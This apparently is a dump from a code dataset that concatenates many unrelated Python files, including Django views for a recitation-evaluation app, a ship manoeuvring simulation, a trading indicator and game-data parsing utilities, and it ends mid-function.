cloud_storage_bucket = 'pubsite_prod_rev_06472528785143111333' # the bucket that contains our google cloud storage (where the reports are stored.)
current_date = datetime.date.today() # getting the current date
first_day = current_date.replace(day=1) # getting the first day of the current month
last_date = first_day - datetime.timedelta(days=1) # going to the previous day of the first month, which will be in the last month
last_month = str(last_date)[5:7] # getting the month of the last month
last_year = str(last_date)[0:4] # getting the year of the last month (only would be different if it was december)
# this code is to be run every month. It is to get the last months data
# therefore the code will get the latest entry in the db and extract the month
# from that date object. Then, if the month in db is equal to the last month, then that
# means the code was already run this month and it has the most up to date data available
if get_last_update_time().month == int(last_month):
print 'there is already up to date data in the db'
print get_last_update_time()
print last_month
sys.exit(0) # terminates successfully
else:
print 'data should be updated'
install_data = get_data(last_year + last_month, 'stats/installs/installs' , '_overview', json_file) # gets raw data for installs
crash_data = get_data(last_year + last_month, 'stats/crashes/crashes' , '_overview', json_file) # gets raw data for crashes
rating_data = get_data(last_year + last_month, 'stats/ratings/ratings' , '_overview', json_file) # gets raw data for ratings
for data, array in rating_data.iteritems(): # replacing all 'NA' with NULL in the rating data
if array[0] == 'NA':
array[0] = 'NULL'
all_data = combine_lists(install_data, crash_data, rating_data) # combining all of the data into one list in order to write it to the csv (or db)
write_to_output(all_data) # writing all of the data to a csv |
17,026 | 09afb51dc12af086973656eed625debbae0d2efb | from pubnub.pnconfiguration import PNConfiguration
from pubnub.enums import PNReconnectionPolicy
from pubnub.pubnub import PubNub
from pubnub.callbacks import SubscribeCallback
import logging
import configparser
import os
log = logging.getLogger(__name__)
class FeederPublisher(object):
def __init__(self, channel='feeder_update', listener_callback=None):
self.pnconfig = PNConfiguration()
config = configparser.ConfigParser()
ini_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "feeder.ini")
config.read(ini_path)
self.pnconfig.subscribe_key = config["pubnub"]["subscribe_key"]
self.pnconfig.publish_key = config["pubnub"]["publish_key"]
self.pnconfig.reconnect_policy = PNReconnectionPolicy.LINEAR
self.pubnub = PubNub(self.pnconfig)
self.channel = channel
if listener_callback:
self.add_listener(listener_callback)
def add_listener(self, listener_callback):
self.pubnub.add_listener(listener_callback)
@staticmethod
def publish_callback(result, status):
log.debug("message sent. Result {}".format(result))
if status.error:
log.error("{} during message publish. {}".format(result, status.error_data.information))
def publish(self, message):
self.pubnub.publish().channel(self.channel).message(message).async(self.publish_callback)
def subscribe(self, subscriber_channel):
self.pubnub.subscribe().channels(subscriber_channel).execute()
class MySubscribeCallback(SubscribeCallback):
def presence(self, pubnub, presence):
log.debug("presence call {}".format(presence))
def status(self, pubnub, status):
log.debug("status called {}".format(status))
def message(self, pubnub, message):
log.info("incoming message: [{}]".format(vars(message)))
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
FeederPublisher().publish(["hello", "again"])
|
17,027 | fcb85c0dbcebafe1034aaf830e34fa6310d8ab7d | class FirstClass:
def setdata(self,value1, value2):
self.data1=value1
self.data2=value2
def display(self):
print(self.data1, '\n', self.data2, '\n')
x = FirstClass()
x.setdata("King Arthur", -5)
x.display()
x.data1="QQ"
x.data2=-3
x.display()
x.anothername="spam"
x.display()
print(x.anothername) |
17,028 | cc8235bf09c92256578c67bdef263e8aff190a86 | import openpyxl
workbook = openpyxl.Workbook()
sheet = workbook.active
sheet.title = '蔡徐坤篮球'
sheet.cell(row=1, column=1, value='名称')
sheet.cell(row=1, column=2, value='地址')
sheet.cell(row=1, column=3, value='描述')
sheet.cell(row=1, column=4, value='观看次数')
sheet.cell(row=1, column=5, value='弹幕数')
sheet.cell(row=1, column=6, value='发布时间')
workbook.save('蔡徐坤篮球.xlsx')
|
17,029 | 56de33af5931c7e8bf2a421fcb5e06917f1b19a7 | # -*- coding: utf-8 -*-
# Django
from django.shortcuts import render
from django.contrib.auth.decorators import login_required, user_passes_test
from django.db.models import Count
from django.forms.models import model_to_dict
from django_filters import rest_framework as filters
# REST
from rest_framework import status
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.decorators import api_view, renderer_classes
from rest_framework.renderers import JSONRenderer
# Tarteel
from evaluation.models import TajweedEvaluation, Evaluation
from evaluation.serializers import TajweedEvaluationSerializer, EvaluationSerializer
from restapi.models import AnnotatedRecording
from quran.models import Ayah, AyahWord, Translation
# Python
import io
import json
import os
import random
# =============================================== #
# Constant Global Definitions #
# =============================================== #
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# ===================================== #
# Utility Functions #
# ===================================== #
# TODO: Update to use Quran DB
def get_tajweed_rule(surah_num=0, ayah_num=0, random_rule=False):
"""If random_rule is true then we get a random tajweed rule. Otherwise returns a
specific rule. Both options return the text and word index.
:return: A tuple with the surah & ayah number, text, rule, and word position
:rtype: tuple(int, int, str, str, int) or tuple(str, str, int)
"""
TAJWEED_FILE = os.path.join(BASE_DIR, 'utils/data-rules.json')
with io.open(TAJWEED_FILE) as file:
tajweed_rules = json.load(file)
tajweed_rules = tajweed_rules['quran']
file.close()
UTHMANI_FILE = os.path.join(BASE_DIR, 'utils/data-uthmani.json')
with io.open(UTHMANI_FILE, 'r', encoding="utf-8-sig") as file:
uthmani_q = json.load(file)
uthmani_q = uthmani_q['quran']
file.close()
if random_rule:
random_surah = random.choice(tajweed_rules['surahs'])
surah_num = random_surah['num']
random_ayah = random.choice(random_surah['ayahs'])
ayah_num = random_ayah['num']
rule_dict = random.choice(random_ayah['rules'])
else:
rule_dict = tajweed_rules['surah'][surah_num - 1]['ayahs'][ayah_num - 1]
rule = rule_dict['rule']
rule_start = rule_dict['start']
rule_end = rule_dict['end']
# 1-indexed
ayah_text = uthmani_q['surahs'][surah_num - 1]['ayahs'][ayah_num - 1]['text']
ayah_text_list = ayah_text.split(" ")
# Get the index of the word we're looking for
position = 0
curr_word_ind = 0
for i, word in enumerate(ayah_text_list):
position += len(word)
if position >= rule_start:
curr_word_ind = i
break
if random_rule:
return surah_num, ayah_num, ayah_text, rule, curr_word_ind
return ayah_text, rule, curr_word_ind
def is_evaluator(user):
if user:
return user.groups.filter(name='evaluator').exists()
return False
# TODO: Deprecated
def get_low_evaluation_count():
"""Finds a recording with the lowest number of evaluations
:returns: A random AnnotatedRecording object which has the minimum evaluations
:rtype: AnnotatedRecording
"""
recording_evals = AnnotatedRecording.objects.annotate(total=Count('evaluation'))
recording_evals_dict = {entry : entry.total for entry in recording_evals}
min_evals = min(recording_evals_dict.values())
min_evals_recordings = [k for k, v in recording_evals_dict.items() if v==min_evals]
return random.choice(min_evals_recordings)
def get_no_evaluation_recording(surah_num=None, ayah_num=None):
"""Finds a recording with the lowest number of evaluations
:returns: A random AnnotatedRecording object which has the minimum evaluations
along with its words, url and recording ID.
:rtype: dict
"""
# Get recordings with a file.
if surah_num is not None and ayah_num is not None:
recording_evals = AnnotatedRecording.objects.filter(
surah_num=surah_num, ayah_num=ayah_num, file__gt='',
file__isnull=False).annotate(total=Count('evaluation'))
# If no recordings, move on to random one
try:
random_recording = random.choice(recording_evals)
except IndexError:
surah_num = None
ayah_num = None
if surah_num is None and ayah_num is None:
recording_evals = AnnotatedRecording.objects.filter(
file__gt='', file__isnull=False).annotate(total=Count('evaluation'))
try:
random_recording = random.choice(recording_evals)
except IndexError:
error_str = "No more unevaluated recordings!"
print(error_str)
return {'detail': error_str}
surah_num = random_recording.surah_num
ayah_num = random_recording.ayah_num
audio_url = random_recording.file.url
recording_id = random_recording.id
# Prep response
ayah = Ayah.objects.get(chapter_id__number=surah_num, verse_number=ayah_num)
ayah = model_to_dict(ayah)
# Get all the words
words = AyahWord.objects.filter(ayah__verse_number=ayah_num,
ayah__chapter_id__number=surah_num)
translations = Translation.objects.filter(ayah__verse_number=ayah_num,
ayah__chapter_id__number=surah_num)
# Convert to list of dicts, note that order is usually flipped.
ayah['words'] = list(reversed(words.values()))
ayah['translations'] = list(translations.values())
ayah["audio_url"] = audio_url
ayah["recording_id"] = recording_id
return ayah
# ============================= #
# API Views #
# ============================= #
class EvaluationFilter(filters.FilterSet):
"""Custom filter based on surah, ayah, evaluation type or recording."""
EVAL_CHOICES = (
('correct', 'Correct'),
('incorrect', 'Incorrect')
)
surah = filters.NumberFilter(field_name='associated_recording__surah_num')
ayah = filters.NumberFilter(field_name='associated_recording__ayah_num')
evaluation = filters.ChoiceFilter(choices=EVAL_CHOICES)
associated_recording = filters.ModelChoiceFilter(
queryset=AnnotatedRecording.objects.all())
class Meta:
model = Evaluation
fields = ['surah', 'ayah', 'evaluation', 'associated_recording']
class EvaluationViewSet(viewsets.ModelViewSet):
"""API to handle query parameters
Example: v1/evaluations/?surah=114&ayah=1&evaluation=correct
"""
serializer_class = EvaluationSerializer
queryset = Evaluation.objects.all()
filter_backends = (filters.DjangoFilterBackend,)
filter_class = EvaluationFilter
@action(detail=False, methods=['get'])
def low_count(self, request):
"""Finds a recording with the lowest number of evaluations
:returns: A random AnnotatedRecording object which has the minimum evaluations
:rtype: Response
"""
ayah = get_no_evaluation_recording()
return Response(ayah)
@low_count.mapping.post
def low_count_specific(self, request):
"""Get a recording of a specific surah and ayah with no evaluation.
:returns: A random AnnotatedRecording object which has the minimum evaluations
:rtype: Response
"""
surah_num = int(request.data['surah'])
ayah_num = int(request.data['ayah'])
ayah = get_no_evaluation_recording(surah_num=surah_num, ayah_num=ayah_num)
return Response(ayah)
class TajweedEvaluationList(APIView):
"""API Endpoint that allows tajweed evaluations to be posted or
retrieved """
def get(self, request, format=None):
evaluations = TajweedEvaluation.objects.all().order_by('-timestamp')
tajweed_serializer = TajweedEvaluationSerializer(evaluations, many=True)
return Response(tajweed_serializer.data)
def post(self, request, *args, **kwargs):
print("EVALUATOR: Received a tajweed evaluation:\n{}".format(request.data))
new_evaluation = TajweedEvaluationSerializer(data=request.data)
if new_evaluation.is_valid(raise_exception=True):
new_evaluation.save()
return Response(new_evaluation.data, status=status.HTTP_201_CREATED)
return Response(new_evaluation.errors, status=status.HTTP_400_BAD_REQUEST)
# ===================================== #
# Static Page Views #
# ===================================== #
@api_view(('GET',))
@renderer_classes((JSONRenderer,))
def get_evaluations_count(request, format=None):
evaluations = Evaluation.objects.all().count()
res = {
"count": evaluations
}
return Response(res)
@login_required
@user_passes_test(is_evaluator, login_url='/')
def tajweed_evaluator(request):
"""Returns a random ayah for an expert to evaluate for any mistakes.
:param request: rest API request object.
:type request: Request
:return: Rendered view of evaluator page with form, ayah info, and URL.
:rtype: HttpResponse
"""
# User tracking - Ensure there is always a session key.
if not request.session.session_key:
request.session.create()
session_key = request.session.session_key
# Get a random tajweed rule and make sure we have something to display
recordings = None
while not recordings:
surah_num, ayah_num, ayah_text, rule, word_index = get_tajweed_rule(random_rule=True)
recordings = AnnotatedRecording.objects.filter(file__gt='', file__isnull=False,
surah_num=surah_num,
ayah_num=ayah_num)
random_recording = random.choice(recordings)
# Make sure we avoid negative count
prev_word_ind = word_index - 1 if word_index > 0 else None
# Make sure we avoid overflow
ayah_text_list = ayah_text.split(" ")
next_word_ind = word_index + 1 if word_index + 1 < len(ayah_text_list) else None
# Fields
audio_url = random_recording.file.url
recording_id = random_recording.id
# Get text rep of rule
category_dict = dict(TajweedEvaluation.CATEGORY_CHOICES)
rule_text = category_dict[rule]
return render(request, 'evaluation/tajweed_evaluator.html',
{'session_key': session_key,
'rule_text': rule_text,
'rule_id': rule,
'surah_num': surah_num,
'ayah_num': ayah_num,
'ayah_text': ayah_text_list,
'word_index': word_index,
'prev_word_index': prev_word_ind,
'next_word_index': next_word_ind,
'audio_url': audio_url,
'recording_id': recording_id})
|
17,030 | 714ac71b4ee944cfeb6e6e3d0848394d1eb91ee2 | from django.shortcuts import render_to_response, render
from worksheet.models.models import WorkSheet
# Create your views here.
def count(request):
clients = []
types = []
return render(request, 'worksheet/count.html', {'client': clients, 'type': types})
def count_result(request):
start_date = request.GET.get('startDate', False)
end_date = request.GET.get('endDate', False)
if start_date and end_date:
clients_all = WorkSheet.objects.filter(time__gte=start_date, time__lte=end_date)
c1 = clients_all.filter(client_type=1).count()
c2 = clients_all.filter(client_type=2).count()
c3 = clients_all.filter(client_type=3).count()
c4 = clients_all.filter(client_type=4).count()
c5 = clients_all.filter(client_type=5).count()
clients = [c1, c2, c3, c4, c5]
types_all = WorkSheet.objects.filter(time__gte=start_date, time__lte=end_date)
t1 = types_all.filter(sheet_type=1).count()
t2 = types_all.filter(sheet_type=2).count()
t3 = types_all.filter(sheet_type=3).count()
t4 = types_all.filter(sheet_type=4).count()
t5 = types_all.filter(sheet_type=5).count()
t6 = types_all.filter(sheet_type=6).count()
t7 = types_all.filter(sheet_type=7).count()
t8 = types_all.filter(sheet_type=8).count()
t9 = types_all.filter(sheet_type=9).count()
t10 = types_all.filter(sheet_type=10).count()
t11 = types_all.filter(sheet_type=11).count()
types = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11]
else:
clients_all = WorkSheet.objects.all()
c1 = clients_all.filter(client_type=1).count()
c2 = clients_all.filter(client_type=2).count()
c3 = clients_all.filter(client_type=3).count()
c4 = clients_all.filter(client_type=4).count()
c5 = clients_all.filter(client_type=5).count()
clients = [c1, c2, c3, c4, c5]
types_all = WorkSheet.objects.all()
t1 = types_all.filter(sheet_type=1).count()
t2 = types_all.filter(sheet_type=2).count()
t3 = types_all.filter(sheet_type=3).count()
t4 = types_all.filter(sheet_type=4).count()
t5 = types_all.filter(sheet_type=5).count()
t6 = types_all.filter(sheet_type=6).count()
t7 = types_all.filter(sheet_type=7).count()
t8 = types_all.filter(sheet_type=8).count()
t9 = types_all.filter(sheet_type=9).count()
t10 = types_all.filter(sheet_type=10).count()
t11 = types_all.filter(sheet_type=11).count()
types = [t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11]
return render_to_response('worksheet/count.html', {'client': clients, 'type': types}) |
17,031 | e3a9fd96544ea0bece3c30299412dfb1967c8d13 | '''
Created on 2017/01/31
@author: Brian
'''
import sqlite3
from os.path import isfile, getsize
defaultDatabase = "textToolStrings.db"
def create_table():
conn = sqlite3.connect(defaultDatabase)
curs = conn.cursor()
curs.execute('CREATE TABLE IF NOT EXISTS textStrings(strings TEXT)')
curs.close()
conn.close()
def data_entry(stringValue):
conn = sqlite3.connect(defaultDatabase)
curs = conn.cursor()
curs.execute("INSERT INTO textStrings (strings) VALUES (?)", (stringValue,))
conn.commit()
curs.close()
conn.close()
|
17,032 | e39c98eb6f80eeae7f5b295fe0b70b041b45ed09 | # Python Program - Find ncR and nPr
import math;
print("Enter 'x' for exit.");
nval = input("Enter value of n: ");
if nval == 'x':
exit();
else:
rval = input("Enter value of r: ");
n = int(nval);
r = int(rval);
npr = math.factorial(n)/math.factorial(n-r);
ncr = npr/math.factorial(r);
print("ncR =",ncr);
print("nPr =",npr);
|
17,033 | 06b40f9ac6d42c19555cd6068b39bce430fa7337 | # Ch6Ex132.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 132
# Title: Postal Codes
def postalCodeParser(code):
charToProvince = {'A': 'Newfoundland', 'B': 'Nova Scotia', 'C': 'Prince Edward Island', 'E': 'New Brunswick', 'G': 'Quebec', 'H': 'Quebec', 'J': 'Quebec', 'K': 'Ontario', 'L': 'Ontario', 'M': 'Ontario', 'N': 'Ontario', 'P': 'Ontario', 'R': 'Manitoba', 'S': 'Saskatchwan', 'T': 'Alberta', 'V': 'British Columbia', 'X': 'Nunavut or Northwest Territories', 'Y': 'Yukon'}
if code[0] in ['D', 'F', 'I', 'O', 'Q', 'U', 'W', 'Z']:
print("Invalid Postal Code!")
return
prov = charToProvince[code[0]]
addrType = 'a rural' if code[1] == '0' else 'an urban'
print("%s is for %s address in %s" % (code, addrType, prov))
def main():
code = input("Enter Postal Code: ").upper()
postalCodeParser(code)
if __name__ == "__main__": main() |
17,034 | f6a510565162549c10bddf770a0198985c7c8de6 | from math import fabs
from typing import Union
import numpy as np
from numpy.lib.stride_tricks import sliding_window_view
from jesse.helpers import get_candle_source
from jesse.helpers import get_config
def fwma(candles: np.ndarray, period: int = 5, source_type: str = "close", sequential: bool = False) -> Union[
float, np.ndarray]:
"""
Fibonacci's Weighted Moving Average (FWMA)
:param candles: np.ndarray
:param period: int - default: 5
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: float | np.ndarray
"""
warmup_candles_num = get_config('env.data.warmup_candles_num', 240)
if not sequential and len(candles) > warmup_candles_num:
candles = candles[-warmup_candles_num:]
source = get_candle_source(candles, source_type=source_type)
fibs = fibonacci(n=period)
swv = sliding_window_view(source, window_shape=period)
res = np.average(swv, weights=fibs, axis=-1)
return np.concatenate((np.full((candles.shape[0] - res.shape[0]), np.nan), res), axis=0) if sequential else res[-1]
def fibonacci(n: int = 2) -> np.array:
"""Fibonacci Sequence as a numpy array"""
n = int(fabs(n)) if n >= 0 else 2
n -= 1
a, b = 1, 1
result = np.array([a])
for i in range(0, n):
a, b = b, a + b
result = np.append(result, a)
fib_sum = np.sum(result)
if fib_sum > 0:
return result / fib_sum
else:
return result
|
17,035 | c6a60f6eeec562785b8aa6f9d8523b39f93c9a25 | from src.manoeuvringModel import manoeuverShip
import math
from matplotlib import patches
class Simulation:
""" The class in which the simulation is created """
activeShips = {}
def __init__(self, world):
self.world = world
self.env = world.env
module = __import__("Scenarios.%s" % self.world.experimentName, globals(), locals(), ['object'], 1)
initial = getattr(module, "initial")
initial(self)
print("Created environment for simulation")
self.env.process(self.runSimulation())
# self.env.process(self.updateRadio())
self.env.process(self.updateGUI())
def runSimulation(self):
self.world.log("Simulation started")
while True:
for shipname in self.activeShips:
self.moveShip(shipname)
for shipname in self.activeShips:
self.updateStatistics(shipname)
self.world.viewer.updatePlot()
yield self.env.timeout(self.world.secondsPerStep/self.world.updateFrequency)
def updateGUI(self):
while True:
self.world.root.update()
yield self.env.timeout(1/30)
def updateRadio(self):
while True:
for shipname in self.activeShips:
self.activeShips[shipname].AIS.sendMessage(self.env.now)
def addDynamicObject(self, objectName, location, course_deg, speed=None, rudderAngle=0, firstWaypoint=None):
ship = self.world.do[objectName]
ship.location = location
ship.course = course_deg
ship.heading = course_deg
ship.rudderAngle = rudderAngle
if speed is None:
ship.speed = ship.vmean
ship.telegraphSpeed = (ship.speed / ship.vmax) ** 2
ship.acceleration = 0
else:
ship.speed = speed
ship.telegraphSpeed = (ship.speed / ship.vmax) ** 2
ship.acceleration = 0
if firstWaypoint is None:
pass
else:
ship.waypoints.append(firstWaypoint)
ship.AIS.update(ship, time=self.env.now)
self.activeShips[objectName] = ship
def removeDynamicObject(self, objectName):
ship = self.world.do[objectName]
ship.location = [0, 0]
ship.course = 0
ship.heading = 0
ship.drift = 0
ship.speed = 0
ship.acceleration = 0
ship.headingChange = 0
ship.telegraphSpeed = 0
ship.rudderAngle = 0
del self.activeShips[objectName]
try:
ship.markerPlot.remove()
except AttributeError:
pass
try:
ship.scalarPlot.remove()
except AttributeError:
pass
except ValueError:
pass
try:
ship.polygonPlot.remove()
except AttributeError:
pass
try:
ship.tag.remove()
except AttributeError:
pass
def moveShip(self, objectName):
ship = self.activeShips[objectName]
# Update timestamp and get time since last update
dt = self.env.now - ship.lastUpdate
ship.lastUpdate = self.env.now
# Use model to move ship
if ship.speed != 0:
manoeuverShip(ship, dt)
if ship.waypoints:
ship.adjustRudder()
def updateStatistics(self, objectName):
shipA = self.activeShips[objectName]
# Calculate closest point of approach
for shipname in self.activeShips:
if shipA is not self.activeShips[shipname]:
shipB = self.activeShips[shipname]
d = math.hypot(shipA.location[0]-shipB.location[0], shipA.location[1]-shipB.location[1])
try:
shipA.perceivedShipCPA[shipB] = min(shipA.perceivedShipCPA[shipB], d)
except KeyError:
shipA.perceivedShipCPA[shipB] = d
if d < 1875:
self.world.log("%s and %s are too close (%d meter)" % (shipA.name, shipB.name, d))
@staticmethod
def createLandPatch(polygon):
patch = patches.Polygon(polygon)
patch.set_color("olive")
patch.set_alpha(0.8)
return patch
@staticmethod
def createDangerPatch(polygon):
patch = patches.Polygon(polygon)
patch.set_color("crimson")
patch.set_alpha(0.2)
return patch
@staticmethod
def createDangerLinePatch(polygon):
patch = patches.Polygon(polygon)
patch.set_linestyle("dashed")
patch.set_edgecolor("crimson")
return patch
|
17,036 | 5947c6ae02f621ce913b8355891214f2be233765 | dicionario = dict()
dicionario = {1: "oi", 2: "olá", 3: "hello", "C": 9}
print(dicionario)
print(dicionario.keys())
print(dicionario.values())
dicionario[2] = "oláá"
print(dicionario)
for chave in dicionario:
print(dicionario[chave])
for chave, valor in dicionario.items():
print(chave,"-",valor)
dicionario.update({"1": 55, 2: "olá de novo"})
print(dicionario) |
17,037 | ae2a17bd00ff747a401320bdde016444c84602ab | import datetime
import json
import re
import pytz
from .dungeon_types import DUNGEON_TYPE_COMMENTS
def strip_colors(message: int) -> str:
return re.sub(r'(?i)[$^][a-f0-9]{6}[$^]', '', message)
def ghmult(x: int) -> str:
"""Normalizes multiplier to a human-readable number."""
mult = x / 10000
if int(mult) == mult:
mult = int(mult)
return '%sx' % mult
def ghmult_plain(x: int) -> str:
"""Normalizes multiplier to a human-readable number (without decorations)."""
mult = x / 10000
if int(mult) == mult:
mult = int(mult)
return '{}'.format(mult)
def ghchance(x: int) -> str:
"""Normalizes percentage to a human-readable number."""
assert x % 100 == 0
return '%d%%' % (x // 100)
def ghchance_plain(x: int) -> str:
"""Normalizes percentage to a human-readable number (without decorations)."""
assert x % 100 == 0
return '%d%' % (x // 100)
def ghtime(time_str: str, server: str) -> datetime.datetime:
"""Converts a time string into a datetime."""
# < 151228000000
# > 2015-12-28 00:00:00
server = server.lower()
server = 'jp' if server == 'ja' else server
tz_offsets = {
'na': '-0800',
'jp': '+0900',
}
timezone_str = '{} {}'.format(time_str, tz_offsets[server])
return datetime.datetime.strptime(timezone_str, '%y%m%d%H%M%S %z')
def gh_to_timestamp(time_str: str, server: str) -> int:
"""Converts a time string to a timestamp."""
dt = ghtime(time_str, server)
return int(dt.timestamp())
def datetime_to_gh(dt):
# Assumes timezone is set properly
return dt.strftime('%y%m%d%H%M%S')
class NoDstWestern(datetime.tzinfo):
def utcoffset(self, *dt):
return datetime.timedelta(hours=-8)
def tzname(self, dt):
return "NoDstWestern"
def dst(self, dt):
return datetime.timedelta(hours=-8)
def cur_gh_time(server):
server = server.lower()
server = 'jp' if server == 'ja' else server
tz_offsets = {
'na': NoDstWestern(),
'jp': pytz.timezone('Asia/Tokyo'),
}
return datetime_to_gh(datetime.datetime.now(tz_offsets[server]))
def internal_id_to_display_id(i_id: int) -> str:
"""Permutes internal PAD ID to the displayed form."""
i_id = str(i_id).zfill(9)
return ''.join(i_id[x - 1] for x in [1, 5, 9, 6, 3, 8, 2, 4, 7])
def display_id_to_group(d_id: str) -> str:
"""Converts the display ID into the group name (a,b,c,d,e)."""
return chr(ord('a') + (int(d_id[2]) % 5))
def internal_id_to_group(i_id: str) -> str:
"""Converts the internal ID into the group name (a,b,c,d,e)."""
return chr(ord('a') + (int(i_id) % 5))
class JsonDictEncodable(json.JSONEncoder):
"""Utility parent class that makes the child JSON encodable."""
def default(self, o):
return o.__dict__
def __str__(self):
return str(self.__dict__)
# directly into a dictionary when multiple val's correspond to a single
# comment, but are unnecessarily delineated
def get_dungeon_comment(val: int) -> str:
if val in range(5611, 5615):
return "Retired Special Dungeons" # These are the last normal dungeons
elif val in range(21612, 21618):
return "Technical"
elif val in range(38901, 38912):
return "Descended (original)"
elif val in range(200101, 200111):
return "Alt. Technial"
elif val in range(200021, 200057):
return "Technical"
elif val in range(200301, 200306) or val in range(200201, 200206):
return "Special Decended"
elif val in DUNGEON_TYPE_COMMENTS:
return DUNGEON_TYPE_COMMENTS[val]
else:
return "No Data"
class Multiplier:
def __init__(self):
self.hp = 1.0
self.atk = 1.0
self.rcv = 1.0
self.shield = 0.0
def parse_skill_multiplier(skill, other_fields, length) -> Multiplier:
multipliers = Multiplier()
if skill == 3:
multipliers.shield = get_last(other_fields)
# Attack boost only
elif skill in [11, 22, 26, 31, 40, 66, 69, 88, 90, 92, 94, 95, 96, 97, 101, 104, 109, 150]:
multipliers.atk *= get_last(other_fields)
# HP boost only
elif skill in [23, 30, 48, 107]:
multipliers.hp *= get_last(other_fields)
elif skill in [24, 49, 149]:
multipliers.rcv *= get_last(other_fields)
# RCV and ATK
elif skill in [28, 64, 75, 79, 103]:
multipliers.atk *= get_last(other_fields)
multipliers.rcv *= get_last(other_fields)
# All stat boost
elif skill in [29, 65, 76, 114]:
multipliers.hp *= get_last(other_fields)
multipliers.atk *= get_last(other_fields)
multipliers.rcv *= get_last(other_fields)
elif skill in [16, 17, 36, 38, 43]:
multipliers.shield = get_last(other_fields)
elif skill in [39]:
multipliers.atk *= get_last(other_fields)
if other_fields[2] == 2:
multipliers.rcv *= get_last(other_fields)
elif skill == 44:
if other_fields[1] == 1:
multipliers.atk *= get_last(other_fields)
elif other_fields[1] == 2:
multipliers.rcv *= get_last(other_fields)
elif other_fields[1] == 3:
multipliers.atk *= get_last(other_fields)
multipliers.rcv *= get_last(other_fields)
elif skill in [45, 62, 73, 77, 111]:
multipliers.hp *= get_last(other_fields)
multipliers.atk *= get_last(other_fields)
elif skill == 46:
multipliers.hp *= get_last(other_fields)
elif skill == 50:
if other_fields[1] == 5:
multipliers.rcv *= get_last(other_fields)
else:
multipliers.atk *= get_last(other_fields)
elif skill == 86:
if length == 4:
multipliers.hp *= get_last(other_fields)
# rainbow parsing
elif skill == 61:
if length == 3:
multipliers.atk *= get_last(other_fields)
elif length == 4:
r_type = other_fields[0]
if r_type == 31:
mult = get_second_last(other_fields) + \
get_last(other_fields) * (5 - other_fields[1])
multipliers.atk *= mult
elif r_type % 14 == 0:
multipliers.atk *= get_second_last(other_fields) + get_last(other_fields)
else:
# r_type is 63
mult = get_second_last(other_fields) + \
(get_last(other_fields)) * (6 - other_fields[1])
multipliers.atk *= mult
elif length == 5:
if other_fields[-1] <= other_fields[1]:
if other_fields[0] == 31:
multipliers.atk *= get_third_last(other_fields) + (5 - other_fields[1]) * get_second_last(
other_fields)
if other_fields[0] == 63:
multipliers.atk *= get_third_last(other_fields) + (6 - other_fields[1]) * get_second_last(
other_fields)
else:
multipliers.atk *= get_third_last(other_fields) + (
other_fields[-1] - other_fields[1]) * get_second_last(other_fields)
elif skill in [63, 67]:
multipliers.hp *= get_last(other_fields)
multipliers.rcv *= get_last(other_fields)
elif skill == 98:
if length > 0:
multipliers.atk *= get_third_last(other_fields) + (other_fields[3] - other_fields[0]) * get_second_last(
other_fields)
elif skill == 100:
if other_fields[0] != 0:
multipliers.atk *= get_last(other_fields)
if other_fields[1] != 0:
multipliers.rcv *= get_last(other_fields)
elif skill == 105:
multipliers.atk *= get_last(other_fields)
multipliers.rcv *= get_mult(other_fields[0])
elif skill in [106, 108]:
multipliers.atk *= get_last(other_fields)
multipliers.hp *= get_mult(other_fields[0])
elif skill in [119, 159]:
if length == 3:
multipliers.atk *= get_last(other_fields)
elif length == 5:
multipliers.atk *= get_third_last(other_fields) + (
(other_fields[4] - other_fields[1]) * (get_second_last(other_fields)))
elif skill == 121:
if length == 3:
if get_last(other_fields) != 0:
multipliers.hp *= get_last(other_fields)
elif length == 4:
multipliers.atk *= get_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
elif length == 5:
if get_third_last(other_fields) != 0:
multipliers.hp *= get_third_last(other_fields)
if get_second_last(other_fields):
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
elif skill == 122:
if length == 4:
multipliers.atk = get_last(other_fields)
else:
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
elif skill == 123:
if length == 4:
multipliers.atk *= get_last(other_fields)
elif length == 5:
multipliers.atk *= get_second_last(other_fields)
multipliers.rcv *= get_last(other_fields)
elif skill == 124:
if length == 7:
multipliers.atk *= get_last(other_fields)
elif length == 8:
max_combos = 0
for i in range(0, 5):
if other_fields[i] != 0:
max_combos += 1
scale = get_last(other_fields)
c_count = other_fields[5]
multipliers.atk *= get_second_last(other_fields) + scale * (max_combos - c_count)
elif skill == 125:
if length == 6:
if get_last(other_fields) != 0:
multipliers.hp *= get_last(other_fields)
elif length == 7:
multipliers.atk *= get_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
elif length == 8:
if other_fields[-2] != 0:
multipliers.atk *= get_second_last(other_fields)
if other_fields[-1] != 0:
multipliers.rcv *= get_last(other_fields)
if other_fields[-3] != 0:
multipliers.hp *= get_third_last(other_fields)
elif skill == 129:
if length == 3:
if get_last(other_fields) != 0:
multipliers.hp *= get_last(other_fields)
elif length == 4:
if get_second_last(other_fields) != 0:
multipliers.hp *= get_second_last(other_fields)
multipliers.atk *= get_last(other_fields)
elif length == 5:
if get_third_last(other_fields) != 0:
multipliers.hp *= get_third_last(other_fields)
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
elif length == 7:
if get_mult(other_fields[2]) != 0:
multipliers.hp *= get_mult(other_fields[2])
if get_mult(other_fields[3]) != 0:
multipliers.atk *= get_mult(other_fields[3])
if get_mult(other_fields[4]) != 0:
multipliers.rcv *= get_mult(other_fields[4])
if get_last(other_fields) != 0:
multipliers.shield = get_last(other_fields)
elif skill == 130:
if length == 4:
multipliers.atk *= get_last(other_fields)
elif length == 5:
if get_second_last(other_fields) != 0:
multipliers.atk *= get_second_last(other_fields)
if get_last(other_fields) != 0:
multipliers.rcv *= get_last(other_fields)
elif length == 7:
if get_mult(other_fields[2]) != 0:
